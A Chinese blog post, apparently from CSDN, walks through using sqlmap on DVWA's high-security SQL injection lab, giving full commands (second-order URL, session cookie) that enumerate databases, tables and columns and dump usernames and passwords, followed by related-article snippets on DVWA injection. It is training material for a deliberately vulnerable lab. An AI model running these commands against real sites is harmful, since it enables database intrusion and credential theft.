sqlmap测试dvwa-sql注入high

已于 2022-08-12 22:10:51 修改
阅读量1.9k 收藏 18
点赞数 2
分类专栏: sqlmap 文章标签: sql 数据库 java
于 2022-08-12 22:04:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39511050/article/details/126311983
版权

逻辑分析

记录使用sqlmap的过程,以dvwa为例,具体内容如下:
dvwa中sql注入高级界面如下显示:
在这里插入图片描述
其中数据提交的页面和查询结果显示的页面是分离成了2个不同的窗口控制的。即在查询提交窗口提交数据后(POST请求),结果的结果在另外一个窗口展示(GET请求)。
此时需要利用其非常规的命令联合操作,如:–second-url=“xxxurl”(设置二阶响应的结果显示页面的url)

利用SQLMap工具注入测试

命令解析:
–url=“查询数据提交时的页面的url”,或用-u “xxxurl”
–second-url=“显示查询结果页面的url”
构造SQLMap命令:

qlmap --url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --second-url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/" --cookie="security=high; PHPSESSID=3skv951e5l0qku8ma8bq0nnbpd" --batch

在这里插入图片描述
执行结果如下:
在这里插入图片描述

1.获取数据库信息

sqlmap --url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --second-url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/" --cookie="security=high; PHPSESSID=3skv951e5l0qku8ma8bq0nnbpd" --batch --dbs

在这里插入图片描述

2.获取当前数据库名称

sqlmap --url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --second-url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/" --cookie="security=high; PHPSESSID=3skv951e5l0qku8ma8bq0nnbpd" --batch --current-db

在这里插入图片描述

3.获取MySQL数据库中的表

sqlmap --url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --second-url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/" --cookie="security=high; PHPSESSID=3skv951e5l0qku8ma8bq0nnbpd" --batch -D dvwa --tables

在这里插入图片描述

4.获取user表中的字段

sqlmap --url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --second-url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/" --cookie="security=high; PHPSESSID=3skv951e5l0qku8ma8bq0nnbpd" --batch -D dvwa -T users --columns

在这里插入图片描述

5.获取用户名和密码

sqlmap --url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --second-url="http://192.168.101.59/DVWA-master/vulnerabilities/sqli/" --cookie="security=high; PHPSESSID=3skv951e5l0qku8ma8bq0nnbpd" --batch -D dvwa -T users -C user,password --dump

在这里插入图片描述

火腿肠
关注
专栏目录
深入理解MySQL安全(四)-DVWA High security SQL注入方法
zhujiu_fu的博客
02-15 178
前面完成了low,miedia level sql的注入的思路和方法,本章继续讲解high level sql注入的思路及方法。
DVWA-SQL注入sqlmap安装和使用)
m0_64037702的博客
07-12 1095
链接:https://pan.baidu.com/s/1-kQgGgzwAJlIbA6hPbvv9Q 提取码:8eqw 双击安装包进行安装 新建一个文件夹选择安装至这个文件夹 我的电脑找到 属性 点击高级系统设置 出现 “系统属性" , 点击环境变量 出现“环境变量” 在下面的“系统变量”里面找到 Path 变量点击编辑(没有找到的话点击新建) 在变量值那里末尾,填上你的Python安装路径 在path中添加自己python的安装路径就行了 Win+R打开cmd输入python出现这个页面表示安装成功
DVWA sql注入-HIGH
m0_46616663的博客
05-26 222
1.判断是否存在sql注入漏洞 看到Click [here to change your ID]页面做了自动跳转,防御了自动化的sql注入 出现报错,存在sql注入 2.判断注入漏洞的类型 不是数字型注入 可以看到这个为字符型注入 3.猜解数据库 猜解并验证列数 数据库字段为2 获取数据库信息 查询用户名和数据库名 爆表名 爆出users中的字段名 获取字段中的user和password ...
[DVWA靶场实战]-SQL注入攻击(命令注入+SQL回显注入+sqlmap工具实现自动化注入)详细教程
最新发布
weixin_60838266的博客
07-24 1191
利用Kali Linux和burpsuite对DVWA靶场的Command Injection模块和SQL Injection模块进行sql注入攻击详细教程,包括使用工具sqlmap进行自动化注入攻击。
DVWA--SQL注入(SQL Injection)--HIgh
JakeLin's Blog
06-16 403
DVWA--SQL注入(SQL Injection)--Low DVWA--SQL注入(SQL Injection)--Medium 级别High 实际和Low级别一样,进行SQL注入,参考Low 后台源码 <?php if( isset( $_SESSION [ 'id' ] ) ) { // Get input $id = $_SESSION[ 'id' ]; // Check database $query = "SELECT ..
Sqlmap
mumuzi2的博客
02-25 398
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
DVWA--sql手工注入(高级)
firecjh的博客
06-09 575
实验环境:配置DVWA平台。进入DVWA平台,选择,将安全级别设置为High。点击,进入测试页面。2.判断列数。3.判断显错点。4.获取数据库名。5.获取表名。6.获取列名。7)获取数据。
Sqlmap 注入DVWA[low]
R4bbit
04-11 1079
0.dvwa要登陆才能访问到带有sql注入的页面,所以我们需要带有cookie注入 参数:--cookie="you cookie" 伪命令: sqlmap -u "http://www.sxxxx.com/1.php?id=111" --cookie="You cookie" 使用演示: 因为命令太长了,不方便看,我将参数以行间隔,真正使用的时候是不需要用行间隔的 sqlmap --url...
DVWA之LOW级别SQL注入---SQLMap使用
weixin_42465260的博客
08-05 7846
看到这篇文章,相信大家对于DVWA的搭建已经没问题了吧,在这里就不在赘述DVWA的搭建过程。 SQLMapdvwa简单使用实例: 一、首先肯定是要判断是否有注入漏洞,在输入框输入1,返回 ID: 1 First name: admin Surname: admin 返回正常; 再次输入1',报错,返回 You have an error in your SQL syntax...
一起学安全测试——用sqlmapdvwa实现SQL注入测试
热门推荐
灰蓝
03-29 1万+
sqlmap是一款进行SQL注入的工具,非常简单好用。我们在dvwa上试着用sqlmap实现注入,拿到数据库的信息。搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。kali linux自带(之后演示在kali上)。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwaSQL Injection,打开浏
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2115
SQL注入与自动注入
SQL注入高级进阶
06-04
SQL注入高级进阶
DVWA下的SQL注入
07-25
SQL
DVWA-SQL Injection 注入&Sqlmap
原味瓜子、的博客
09-22 467
文章目录SQL注入一、Low等级二、Medium等级三、High等级四、Impossible SQL注入 指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 一、Low等级 1、漏洞分析 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
2019-2-26 dvwa学习(3)--sql注入级别high和session
weixin_42555985的博客
02-26 3303
2019-2-26 dvwa学习(3)–sql注入级别high 继续把dvwa环境安全级别调整为high 观察界面 high级别页面,点击&amp;amp;quot;here to change your ID&amp;amp;quot;,会打开另外一个网页(session-input.php),然后输入3,提交,在主页面上会显示数据。 我们打开session-input.php的开发者工具,获取cookie 现在尝试按照前面的方式攻击,pos...
DVWA-SQL注入
WY92139010的博客
05-03 965
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
dvwa sql 注入高级
gwl7878的博客
07-07 4059
cat sqli.txt  POST /dvwa/vulnerabilities/sqli/session-input.php HTTP/1.1 Host: 172.19.180.27 Proxy-Connection: keep-alive Content-Length: 19 Cache-Control: max-age=0 Accept: text/html,applicatio
DVWA sql注入high
gclome的博客
07-05 4755
有了前两关的基础,现在做起来,比较得心应手了 现在开始: 1.输入1' 输入1' and '1'='1 输入1' and '1'='2 由此可见,这也是一个字符型的注入 2.获取字段数 输入1' order by 2# 输入1' order by 3# 由此可见,字段数是2, 我觉得所谓high等级较前两个的区别就是出错了之后,不再提醒错误原因,只显示Something went wrong. 3...
SQLMap 的 --sql-shell 和 --os-shell 的区别
05-20
SQLMap是一款自动化的SQL注入工具,可以通过一些选项来执行不同的操作。其中,--sql-shell和--os-shell是两个不同的选项,它们的区别如下: 1. --sql-shell:这个选项会在目标数据库中打开一个交互式的SQL shell,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值